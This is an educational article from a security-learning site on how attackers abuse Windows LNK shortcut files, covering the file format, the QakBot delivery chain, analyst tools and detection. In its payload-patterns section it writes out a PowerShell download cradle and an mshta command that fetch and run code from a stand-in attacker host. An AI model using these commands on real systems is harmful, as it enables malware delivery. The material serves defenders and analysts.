EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All articles
Malware Delivery

LNK and Shortcut File Abuse

When Microsoft blocked internet-marked macros in 2022, attackers pivoted to LNK files. The binary structure, embedded command abuse, and the QakBot delivery chain that made LNK the dominant initial access vector of 2023.

Ashish Revar13 May 20269 min read4 views

Sign in to mark this article as read and track your progress.

Related to this topic

Continue learning

Reference material

eBook
REMA eBook 2026
v1.0
Open resource
Cheatsheet
REMA Cheatsheet 2026
v1.0
Open resource
MCQ Bank
REMA MCQ Bank 2026
v1.0
Open resource
Question Bank
REMA Question Bank 2026
v1.0
Open resource

External references

Microsoft: [MS-SHLLINK] Shell Link Binary File Format

The authoritative specification for the LNK binary format. Required reading for understanding the field layout.

reference
Proofpoint: LNK Delivery Rise After Macro Blocking

Proofpoint's tracking of the shift from macro-based to LNK-based delivery across 2022.

reference
LnkParse3 (Python)

Python library for parsing LNK files. Outputs full structure as JSON including command-line arguments.

tool
More articlesTest your knowledge

Why LNK Files Became the Dominant Delivery Vector

In February 2022, Microsoft announced that Office would block macros from files downloaded from the internet by default. The change was enforced progressively across Microsoft 365 and Office 2021 from mid-2022 onward. Within months, the malware delivery ecosystem had pivoted. Proofpoint tracked a 66% decline in macro-based delivery and a corresponding rise in LNK, ISO, and HTML smuggling techniques between Q1 and Q4 of 2022. LNK files became the most prominent of these alternatives, used by QakBot, IcedID, Emotet (post-resurgence), and multiple nation-state actors.

The reason is straightforward: LNK files are Windows shell shortcuts. Every Windows user understands "double-click to open." A well-crafted LNK file looks like a PDF, a Word document, or an invoice. Double-clicking it executes arbitrary commands.

The LNK Binary Structure

A LNK file is a binary format defined in [MS-SHLLINK]. The structure relevant to analysts:

ShellLinkHeader (76 bytes, fixed). Contains the magic bytes (4C 00 00 00), a CLSID, and LinkFlags that declare which optional sections follow. The HAS_ARGUMENTS flag (0x00000020) indicates embedded command-line arguments — the first thing to check.

LinkTargetIDList. The path to the target file as a series of shell item IDs. In malicious LNKs this often points to a legitimate Windows binary (cmd.exe, powershell.exe, mshta.exe, wscript.exe) to give the shortcut a plausible target.

LinkInfo. Volume and path information for the target. May be populated with a UNC path pointing to attacker infrastructure for credential harvesting via NTLM relay.

StringData. Contains the embedded command-line arguments in the COMMAND_LINE_ARGUMENTS field. This is where the payload lives in virtually all malicious LNKs.

Typical Payload Patterns

The StringData section commonly contains one of these patterns:

PowerShell download cradle:

/c powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://attacker.com/stage2.ps1')"

LOLBin proxy execution (mshta):

mshta.exe https://attacker.com/payload.hta

DLL sideloading setup (QakBot 2023 pattern):

/c cmd /q /c start /b "" "C:\Users\Public\msedgeupdate.exe"

The LNK is bundled inside a ZIP or ISO alongside a legitimate signed binary (msedgeupdate.exe, a renamed copy of a real application) and a malicious DLL. The LNK launches the legitimate binary, which sideloads the DLL from the same directory.

The QakBot LNK Chain

The QakBot delivery chain documented extensively in 2023 campaigns followed this structure:

  1. Phishing email with a ZIP attachment
  2. ZIP contains: LNK file + legitimate signed PE + malicious DLL
  3. Victim double-clicks LNK
  4. LNK executes cmd.exe /c start "" [legitimate PE]
  5. Legitimate PE loads malicious DLL via DLL search order hijacking
  6. DLL unpacks and injects QakBot core into a legitimate Windows process
  7. QakBot establishes C2 and drops Cobalt Strike

The chain is notable for keeping the initial malicious activity entirely within a signed legitimate binary's process context until the DLL injection stage.

Analyst Tools

LnkParse3 (Python):

pip install LnkParse3
lnkparse -j suspicious.lnk

Outputs the full LNK structure as JSON. The command_line_arguments field in the output is what matters most.

lnk2json: Similar functionality, useful as a cross-check.

ExifTool: Extracts metadata from LNK files including creation timestamps, drive serial numbers, and machine SID — useful for infrastructure attribution.

Strings + grep: For triage without tooling, strings -n 8 suspicious.lnk | grep -i "powershell\|mshta\|cmd\|wscript" catches most commodity samples.

Detection

  • YARA on LNK arguments. Rules matching PowerShell download cradles, mshta URLs, and cmd.exe /c patterns in the binary offset range for StringData.
  • Process creation telemetry. Parent process explorer.exe spawning cmd.exe or powershell.exe with hidden window flags is highly anomalous for normal user activity.
  • LNK file size. Legitimate shortcuts are typically under 2 KB. Malicious LNKs with embedded commands are 2-10 KB. LNKs over 10 KB often contain embedded binary data.
  • Zone Identifier on the LNK. Any LNK with ZoneId=3 (downloaded from internet) that is double-clicked should be treated with high suspicion. Defender and many EDRs alert on this natively.